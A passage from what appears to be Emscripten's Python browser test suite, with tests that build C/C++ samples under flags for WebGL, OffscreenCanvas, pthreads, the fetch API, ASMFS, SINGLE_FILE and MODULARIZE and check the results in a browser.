td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-s', 'TEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
self.assertLess(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
@no_fastcomp('not optimized in fastcomp')
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure', '1', '-s', 'INCOMING_MODULE_JS_API=[]', '-s', 'ENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5680), 100)
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
self.skipTest('This test is disabled because current OffscreenCanvas does not allow transfering it after a rendering context has been created for it.')
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD']]:
for version in [[], ['-s', 'FULL_ES3'], ['-s', 'FULL_ES3']]:
args = ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest('webgl_draw_triangle.c', '0', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'MAX_WEBGL_VERSION=1'],
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1']
if asyncify:
if not self.is_wasm_backend():
continue
# given the synchronous render loop here, asyncify is needed to see intermediate frames and the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
create_test_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
